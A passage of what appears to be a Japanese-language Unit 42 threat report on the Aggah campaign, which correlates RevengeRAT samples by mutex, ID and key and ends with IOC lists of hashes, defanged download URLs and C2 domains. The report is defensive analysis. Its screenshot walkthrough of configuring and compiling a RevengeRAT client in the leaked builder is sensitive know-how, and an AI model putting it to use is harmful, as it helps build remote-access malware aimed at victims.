| SHA256 | c365b15cb567da7e9c04dffa0de1cb2b8104d5fe668c17691d8c683 80bcd6d30 |

*表4.pastebin\[.\]com/raw/sgawvit9からのデコードされたペイロード*

HAGGAの貼り付けの1つには、タイトル'kronoz2 back2new'が含まれています。このドメインは、図12に示すHAGGA Pastebinアカウントとの別の関係が存在する可能性を示していました。オープン ソースの調査から、類似するドメインkronoz.duckdns\[.\]orgが、以下のハッシュでRevengeRATサンプルに関連付けられていることが明らかになりました。

|--------|-------------------------------------------------------------------|
| SHA256 | fa5500a45e98e084b489301fd109676a4d8b0d3b39df4d9e2288569 e232a9401 |

*表5.kronoz.duckdns\[.\]orgに関連付けられたファイル*

すべての特定されたサンプルは、付録Aに記載されています。

すべての配信文書とRevengeRATペイロードを調べてみると、1つのペイロードを除くすべてにミューテックスRV\_MUTEX-WindowsUpdateSysten32 (攻撃者によって"System32"を"Systen32"と意図的にスペルミスされている点に注意)と、HOTEIS NOVOS (ポルトガル語で"NEW HOTELS")にデコードされるbase64エンコードされたID SE9URUlTIE5PVk9Tが含まれていることを発見しました。弊社の使用可能なリポジトリを検索して、これらの文字列を含むサンプル数を確認しました。早くは2018年9月を皮切りに50を超えるファイルが見つかりました。それらは、付録Aに記載されています。これらのサンプルの多くに、同じ'hagga'キーが含まれていましたが、それ以外にも3つの追加的なキーにも気付きました。'oldman'、'steve'、'roma225'です。'roma225'キーについては、2018年12月の[Yoroiによる「The Enigmatic "Roma225" Campaign」](https://blog.yoroi.company/research/the-enigmatic-roma225-campaign/)というタイトルの発行物で説明されています。ミューテックスとIDが設定されていない1つのサンプルは、表5に記載したサンプルでした。そのサンプルには、ミューテックスRV\_MUTEX-cuiGGjjtnxDpnFと、'Milegona'にデコードされるID TWlsZWdvbmE=が含まれています。

## RevengeRATサンプルの相関付け

RevengeRATは、オープン ソースで無料で入手可能なビルダーが多数漏出している商用トロイの木馬で、ツールの使用を特定の攻撃者または攻撃キャンペーンに帰属させることを困難にしています。このため、Aggah関連のサンプルで見られるミューテックス、ID、およびキーが、RevengeRATの標準のデフォルト値ではないのかどうか、またピボットや相関付けを目的に使用するための十分な強度がそれらにあるのかどうかを判別しようとしました。2人の無関係な攻撃者が設定で同じ値を使用する可能性を測定するために、漏出したRevengeRATビルダー(v0.3)を使用して、攻撃者が、Aggahキャンペーンで配信されたペイロードと同じミューテックス、ID、キーを共有するRevengeRATサンプルを作成するためにたどる必要のあるプロセスを視覚化しました。

驚いたことに、2人の無関係な個人が単なる偶然で、そのミューテックス、ID、およびキーを使用する可能性は予想以上に低いことがわかりました。これは、攻撃者が、ミューテックス、ID、およびキーを、RevengeRATビルダー内の特定のフィールドに手作業で入力する必要があるためだと考えます。これらのフィールドは、トロイの木馬を作成するために必要な手順の以下の説明の中で取り上げています。

このキャンペーンで使用されたRevengeRATペイロードを作成するために、攻撃者はRevengeRATサーバーを使用して、適切にフィールドが設定された実行可能ファイルをコンパイルします。初めに、攻撃者は、図14に示すとおり、「Socket Key(ソケット キー)」フィールドを"hagga"に設定し、「Start Listening(リスニングの開始)」をクリックします。
![図14.RevengeRATビルダーでの「Socket Key(ソケット キー)」の設定](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-201.png) 図14.RevengeRATビルダーでの「Socket Key(ソケット キー)」の設定

サーバーが設定されリスニングを開始すると、図15に示すとおり、攻撃者は「Client Builder(クライアント ビルダー)」ボタンをクリックして、RevengeRATクライアントを作成します。
![図15.RevengeRATクライアント ビルダー](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-202.png) 図15.RevengeRATクライアント ビルダー

クライアント ビルダーで、図16に示すとおり、攻撃者は「Network Settings(ネットワーク設定)」ドロップダウンをクリックして、ドメイン"lulla.duckdns\[.\]org"とTCPポート2336を入力してから、追加ボタンをクリックします。
![図16.RevengeRATの「Network Settings(ネットワーク設定)」の設定](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-203.png) 図16.RevengeRATの「Network Settings(ネットワーク設定)」の設定

その後、攻撃者は「Basic Settings(基本設定)」ドロップダウンで、選択したID "HOTEIS NOVOS"を「Client Identifier(クライアントID)」フィールドに入力し、"-WindowsUpdateSysten32"を「Client Mutex(クライアント ミューテックス)」フィールドに追加します(デフォルトですでに"RV\_MUTEX"が入っているため)。図17は、正しいフィールドに追加されたこれらの値を示しています。ここで特に興味深い点は、攻撃者が、このフィールドの隣にあるプラス("+")ボタンをクリックしてハイフンとランダムな文字列を連結するのではなく、文字列"-WindowsUpdateSysten32"を手作業で入力していることです。
![図17.RevengeRATの「Basic Settings(基本設定)」のセットアップ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-204.png) 図17.RevengeRATの「Basic Settings(基本設定)」のセットアップ

最後に、ペイロードをコンパイルするために、攻撃者は図18に示すとおり、サービス利用規約に同意し、「Compile(コンパイル)」ボタンをクリックする必要があります。
![図18.RevengeRATでのコンパイルの開始](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-205.png) 図18.RevengeRATでのコンパイルの開始

「Compile(コンパイル)」ボタンをクリックすると、RevengeRATサーバーが"Client.exe"というデフォルト名のクライアント実行可能ファイルを作成します。攻撃者は、その攻撃で配信する前に、それをシステムに保存できます。図19は、デスクトップ上のRevengeRATクライアント アイコンを示しています。
![図19.RevengeRATクライアント アイコン](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-206.png) 図19.RevengeRATクライアント アイコン

図16と図17に見られるコンパイルされた"Client.exe"内の設定は、図7と図8で示したとおり、AggahキャンペーンでPastebinからダウンロードされたRevengeRATの設定と視覚的に一致します。これは、このキャンペーンに関与した攻撃者が、それらのペイロードを作成するために同様の手順に従ったことを示唆しています。同じクライアントIDとソケット キーを共有するRevengeRATペイロードを作成するために実行された一連の手順は、高い確率で、共通の攻撃者が関与したことを示しています。

## 結論

当初、弊社のテレメトリによると、これは中東のある国の組織にかなり的を絞っているように思われました。しかしながら、さらに分析した結果、これは、米国、欧州、アジアを含め、それらに限定されず、多くの地域に影響を及ぼすような、より大規模なキャンペーンのごく小さな部分であると考えられました。残念ながら、弊社の現在のデータ セットでは、多数の被害端末に侵害する以外の攻撃者の動機に対する洞察は得られていません。

このアクティビティの多くは行動的に見て、Gorgon Groupの犯罪活動に潜在的に関連しているようにみえますが、現在のところ明確にはなっておらず、証明するにはさらに分析する必要があります。[Unit 42](https://unit42.paloaltonetworks.com/ja/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/)と[Yoroi](https://blog.yoroi.company/research/the-enigmatic-roma225-campaign/)は双方とも、最近、類似のブログを公開しました。どちらも類似した策略を示していますが、Gorgon Groupとの関連については信頼度の高い評価はされていません。Gorgon Groupとの明確なつながりは定かではありませんが、弊社では、共通のオペレータがこのブログで説明したアクティビティに関与した可能性を示す、これらのRevengeRATサンプルの独自の設定に基づいてそれを評価しています。

RevengeRATは、大量に見られる公開されているRATです。このRATの一部のユーザーは、公開されている段階的なガイドに従うことから、PastebinなどのC2サポート用の代替の格納先を活用する方法において多少精巧化する方向に移行しているようです。これらの手法の変化は、セキュリティ デバイスによりブロックされにくい正規のサービスの背後に隠れることで、オペレータには役立つかもしれません。

パロアルトネットワークスのお客様は、これらのオペレータから以下に示す方法で保護されています。

* AutoFocus: お客様は、現在、以下のタグを使用して、このキャンペーン活動を追跡できます。[Aggah](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Aggah)、[RevengeRAT](https://autofocus.paloaltonetworks.com/#/tag/Unit42.RevengeRAT)
* WildFireおよびTraps: このレポートで悪意のあるものとして特定されたすべてのマルウェアを検出します

パロアルトネットワークスは、ファイルのサンプルとIOCを含め、同志のサイバー脅威アライアンス(CTA)メンバーとの間で、弊社の所見をこのレポートで共有します。CTAのメンバーは、自身のお客様に対する保護を迅速に導入し、悪意のあるサイバー攻撃者を組織的に阻止するためにこの情報を使用します。サイバー脅威アライアンスの詳細については、www.cyberthreatalliance.orgをご覧ください。

## 付録A:

### IOC

#### **悪意のある文書とペイロード**

* 6101f3210638a6068a9d40077f958e8d8a99ffed686a48426784f368e0ac021b
* 89d302cfe11c5fdca420d12cc36d58b449f24ee761b822cb8a22497af7e873ba
* 248456219c1be39f494301a16cae0a4ed9676be8d1155fa8ba5540d223797e97
* 82e64d2233cd8e755fecfefbd976f6143138f9b33e037f24a25b05fe9abd5620
* 1eef9ef568703ba6558923ec88cf960ed86086d87488a188709d32827877f528
* 9b47e150a9259ae7a6df20f070dc9faf9d5a589347f8db8a9f64c64060cb7606
* 679f1d59116af145f4f7c1a4d1cdb66e4402b0da906a491e09071e8eac696a16
* fa5500a45e98e084b489301fd109676a4d8b0d3b39df4d9e2288569e232a9401
* 98136bc4323e00f64b63d1035c313bc08fb56af7894ac050b8e9db6961593eef
* c365b15cb567da7e9c04dffa0de1cb2b8104d5fe668c17691d8c68380bcd6d30
* b9b67c885200f90eaf9c4911b3a7f5e6707bcb51d1b892df1bde11013a60f6b5
* ec8ff76234aca351169e7cf4973b8b5d603fa165815107482cbd0d803a829e81
* aaabc63bd58fa4b8e2cb79630ea5e24c55f29327cae8ca36aae3219b95100669
* c87fb09929159c2dab63d609d7bde992ce979f3545fbe20ddca0a3f263d9603f
* abba33bdc8cf21423202b000771ec10d8ab7248f199d8211e53be03c9905b0ed
* a4c1a9d4a6be9290a58b282f6b7dc75ebd4d4e3866df4fdab80eac56274aabf1
* 947ddcefbb1170a6fbd1ba341c773444c1833bedecdb4d6684e05b8555765117
* 6fe3548e0dc7fb605ee69791b752df0d9f3d8f5db49b2811011ac2a092ab0a28
* 6def95b2858c043e261b8f4d440abc1436a9dc551906d86a37c5f3331af8cbfc
* eacad199f02e26ccdc7a866c18e585f7ee7e2a80ef0325208ddb22b1d059be2f
* d2a16840541f905f7bcecf64e2d7dc827f314c4b97daf6e4cc4262fd91fdd14c
* 61600526307ec08137967b49b230c03ce8a4e1d2f0d58ea2e5d8b2ab3bf92df7
* 8e6c25f517a69c5da329f858b291b4d146c3fd0dd07c17a1d8a6851cddb347eb
* 7acd5696306ae7ed8de112f096917487df2d01c2aa66b4b9d2a37ea36b597b1a
* 2815552fd2f57eba147715331f96387dcb4769d3af816e9db2195e5602fc3a1a
* 251e3e25584d1a654a395accbcfdb506ec8b9d7039cb3ab725e14415d3c71aad
* f5e170571689b393139b9cea484a9683305129ecbf2ab4ebb93fc997ee1d31aa
* 77a1430cfd728daa7a61e10f3cdc3409104cae1aed65711c8f5ce425c6920cb7
* 9c8fa4205b2ed8a6f60156bdc39d33a23c6e503cf2f8e69d66bf2980e78bacef
* c57ff49bfe21e345c2bde30bc8feb60626f3c7839b1c2e5a1f01b9a567f911d8
* 8e771cbb12b259d4d12feac34c80e95eb38228dea393d49e0b9cc6f19861847c
* abcce639df67279c73f327b2c511183c00ca96555fe481a4ae417bf752c96efa
* 83d9c57cfc40457b072bdc0e062dd5ca4958a91d8cf3387dbedd99af753da640
* 5976fca040071eb33ca383412b915e5160133c4e0f8a07bbbaa478ceeee0a890
* a5c3c96b655d3115a39875e0303951fef2f2d6119b0af9eaadf57bacfae3f5cb
* 10d4bd37cd29071186b4ef31341edb79a9ae05c6bc8d26c9850cfeccabb90d1f
* 89903b38efc7a86da63d547d3d4e3439d64656a030cb289eff4721bc5ada3e13
* 464f30101630f06013ea65e72b0c043fa1fc83440d9c3367e474d6309d3fe4c9
* 5e226f1c0729d1fbcf6e074e28009d35e2f6eaa4d4eb0c411892ea56e1299c86
* f57fff1b8acdee475b161ec1313452f0fe66077142fc677a63f7914a96890bae
* a1879f1f3c2bbb1a4cf8af8e54230c3b0b88c29e37902c88d37ec9d7a1138894
* 3fa2591b208137d68aa87da931d9cc152a62250b7d26755818f362fa5015a99a
* 87f43fd2f6c9d1439ceb250e3bd045a07d9a8c214cf17dc66a8c22a3846b6437
* 4e2997adac5ae57ab92512e5b02e9a5ceb588f287a68387420113ed7b3d347d2
* d32f1bd358b97f8f1ae2295c7e8969fab1460d9d54c9528dcfbb42c96a74b31b
* f69fff5106fc73672569abc62ad85cfa461c237d9222426db20d6565021c110f
* 5742ebd53b2b495df0c6bff8ddc17d1726cb8e76e269bd8207b07a0a3ee2b813
* d2a2373a386392f72372c9a23b42b43fd2652b6dafce6a6d8d44368ccbfdadb6
* b9f74a648b0202109d2c53d68a8474d6eabfefba28bf99a53517ece52da483d5
* 3088fcd46c51e7ace8aee4e9bfb018aa1d0b0a52fbea62e5ef121e4fe637ebfc
* 54cba5cfb44379f8a4aac2e1d93d7e8e2ba83afe312d2b1a4f9145846efcd413
* 00a002607b6e7938292e7ae81ca60d58a091c456ea4343210d4bb610b6edee01
* 4c29279f341f568056fe9e2ff8bfb2fcaf06b065246329ca9652fcd7986b405d
* 1d1904dad2df5d677342806cbf1b67b9840d1bc9c85c10928896fcfa91661762
* 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f
* b10519bb52656a09aa146305d8b2ec4aa55f3dba43c633d9de23046798a32a2f
* b6db8716bedd23042883f31132fa00b4125c659f2799d239f42105367ff42aec
* 821e6f3faacb4edafa8ddb60f83a7c8e87845a07ad8d1f8362a7c68cd8a48343
* 1fd98d66d123d4d0c049b4e1053d22335ef9dcec9fdde398d608c7d7d23ed280
* 5ca968f9e6a97505abe7c732b5ee573f787b11f294ccbf3a96ae7b77ccce004c
* 26f5e813e34c05cd1e553224e5c8284ced7fa648d55725416232c24e58546e60
* ef837119fc241e8fde85f36f4635a71f6b87aecf39dc979961be914f48c4ef4c
* d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946
* 915535fd77ac89a3a86eca6b3a1f1852f69c141050754f059c094c39a9ee4259
* 0671a2b4ae1a94edca9f65f7d11199d6526cab1fd53911e114ab772900d8a583
* ea3cab2a0b74e30c0d6812e3ef6fcc9e47ea723c98d39fa1e04d5edf03193ff0
* de657d3538e96a8d2c74b7c4f8c6fb2e51d67f12d158abfea2964298a722993c
* 70657b183854550e77633f85d9e63fbf0b01a21131388228985322880b987b9a
* bc8a00fddff73accaff5eb5f3a6ca182a5282502d7af054ca9176d2e98a5116a
* c3f36883ebf928c8403e068648299b53b09fecb0f56986980319e83f13dc296c
* 0e5011ee17c5f9bbcad8df4dc2a971fe56346f8ca7ce4e93d25f3b02086c581c
* 51147c260c18d3e766006ae4ffa216d4c178c8ee669a83391fab0de98da24b27
* e1eb9daa5fb43b9f07e2b75f931a815fd5adf7e3f8d4f885740202af886402da
* 08883b4d7081d51bb9d9429f856c7c4c95f47a22f38aeb48b7772635d718c7ca
* 12a7ac8838681a95339e24683c0c8e6410a040a8a8ce5fe72bc175b724cb0aa9

#### **ダウンロードURL**

* www.bitly\[.\]com/nliasjdASd1
* www.bitly\[.\]com/nliasjdASd2
* www.bitly\[.\]com/nliasjdASd3
* www.bitly\[.\]com/nliasjdASd4
* www.bitly\[.\]com/nliasjdASd5
* www.bitly\[.\]com/nliasjdASd6
* www.bitly\[.\]com/nliasjdASd7
* www.bitly\[.\]com/nliasjdASd8
* www.bitly\[.\]com/nliasjdASd9
* www.bitly\[.\]com/nliasjdASd11
* www.bitly\[.\]com/nliasjdASd12
* www.bitly\[.\]com/nliasjdASd13
* www.bitly\[.\]com/SexoPhone1
* www.bitly\[.\]com/SexoPhone2
* www.bitly\[.\]com/SexoPhone4
* www.bitly\[.\]com/SmexEaldos1
* www.bitly\[.\]com/SmexEaldos2
* www.bitly\[.\]com/SmexEaldos3
* http://bitly\[.\]com/SmexEaldos4
* www.bitly\[.\]com/SmexEaldos5
* www.bitly\[.\]com/SmexEaldos6
* www.bitly\[.\]com/SmexEaldos7
* www.bitly\[.\]com/SmexEaldos8
* www.bitly\[.\]com/SmexEaldos9
* www.bitly\[.\]com/SmexEaldos10
* www.bitly\[.\]com/XAMSeWaWz
* www.bitly\[.\]com/CAEanwQA
* www.bitly\[.\]com/MinPoXAsUKx
* www.bitly\[.\]com/MinPoXAs
* http:/bitly\[.\]com/chutter1
* www.bitly\[.\]com/doc201901000791
* www.bitly\[.\]com/doc201901000793
* www.bitly\[.\]com/ASDAWnZqWas
* https://bjm9.blogspot\[.\]com
* emawattttson.blogspot\[.\]com
* https://treffictesgn.blogspot\[.\]com
* https://miganshumaratamoligossa.blogspot\[.\]com
* https://buydildoonline.blogspot\[.\]com
* https://pastebin\[.\]com/raw/2LDaeHE1
* http://pastebin\[.\]com/raw/YYZq1XR0
* https://pastebin\[.\]com/raw/tb5gHu2G
* http://pastebin\[.\]com/raw/0c9cC2iM
* http://pastebin\[.\]com/raw/sgawvit9

**以下のインジケーターがRevengeRAT関連として特定されましたが、RevengeRAT限定ではない可能性があります。**

* frankmana.duckdns\[.\]org
* workfine11.duckdns\[.\]org
* oldmandnsch.duckdns\[.\]org
* oldmandnsch.duckdns\[.\]org
* blackhagga.duckdns\[.\]org
* skyrocket1.duckdns\[.\]org
* skyrocket1.duckdns\[.\]org
* kronoz.duckdns\[.\]org
* oldmandnsch.duckdns\[.\]org
* kronozzz2.duckdns\[.\]org
* lulla.duckdns\[.\]org
* decent.myvnc\[.\]com
* decent5.myvnc\[.\]com
* jayztools1.ddns\[.\]net
* jayztools2.ddns\[.\]net
* jayztools3.ddns\[.\]net
* totallol.duckdns\[.\]org
* totallol1.duckdns\[.\]org
* totallol2.duckdns\[.\]org
* totallol3.duckdns\[.\]org
* decent2.myvnc\[.\]com
* decent3.myvnc\[.\]com
* decent1.myvnc\[.\]com
* decent4.myvnc\[.\]com
* jordanchen736.sytes\[.\]net
* jordanchen7361.sytes\[.\]net
* jordanchen7362.sytes\[.\]net
* jordanchen7363.sytes\[.\]net
* lalacious1.serveftp\[.\]com
* lalacious2.serveftp\[.\]com
* lalacious3.serveftp\[.\]com
* lalacious4.serveftp\[.\]com
* mastermana1.serveirc\[.\]com
* mastermana2.serveirc\[.\]com
* mastermana3.serveirc\[.\]com
* mastermana4.serveirc\[.\]com
* mastermana5.serveirc\[.\]com
* lullikhao.ddns\[.\]net
* lullikhao1.ddns\[.\]net
* lullikhao2.ddns\[.\]net
* bullol.duckdns\[.\]org
* cocomo.ddns\[.\]net
* haggasinger2.ddns\[.\]net
* haggasinger.ddns\[.\]net
* haggasinger1.ddns\[.\]net
* loramer1.ddnsking\[.\]com
* easykill.servebeer\[.\]com
* easykill3.servebeer\[.\]com
* easykill2.servepics\[.\]com
* easykill1.servepics\[.\]com
* easykill3.servepics\[.\]com
* helloweenhagga.ddns\[.\]net
* helloweenhagga3.ddns\[.\]net
* helloweenhagga4.ddns\[.\]net
* helloweenhagga2.ddns\[.\]net
* revengerx211.sytes\[.\]net
* revengerx212.sytes\[.\]net
* revengerx213.sytes\[.\]net
* revengerx214.sytes\[.\]net
* revengerx215.sytes\[.\]net
* revengerx216.sytes\[.\]net
* revengerx217.sytes\[.\]net
* revengerx218.sytes\[.\]net
* revengerx219.sytes\[.\]net
* revengerx210.sytes\[.\]net
* office365update.duckdns\[.\]org
* systen32.ddns\[.\]net
* bhenchood.ddns\[.\]net
* emmanuelstevo.ddns\[.\]net
* zinderhola1.ddns\[.\]net
* zinderhola.ddns\[.\]net
* myownlogs.duckdns\[.\]org
* cocomo1.ddns\[.\]net
* cocomo10.serveblog\[.\]net
* cocomo2.ddns\[.\]net
* cocomo2.serveblog\[.\]net
* cocomo3.serveblog\[.\]net
* cocomo4.serveblog\[.\]net
* cocomo5.serveblog\[.\]net
* cocomo6.serveblog\[.\]net
* cocomo7.serveblog\[.\]net
* cocomo8.serveblog\[.\]net
* cocomo9.serveblog\[.\]net
* mrcode.hopto\[.\]org
* mrcode1.hopto\[.\]org
* mrcode2.hopto\[.\]org
* pussi2442.ddns\[.\]net
  トップに戻る

### タグ

* [Aggah](https://unit42.paloaltonetworks.com/ja/tag/aggah-ja/ "Aggah")
* [RevengeRAT](https://unit42.paloaltonetworks.com/ja/tag/revengerat-ja/ "RevengeRAT")
* [Template Injection](https://unit42.paloaltonetworks.com/ja/tag/template-injection-ja/ "Template Injection")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:DNSトンネリングの現状: OilRigのDNSトンネリング概要](https://unit42.paloaltonetworks.com/ja/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ "DNSトンネリングの現状: OilRigのDNSトンネリング概要")

### 目次

* 

### 関連記事

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
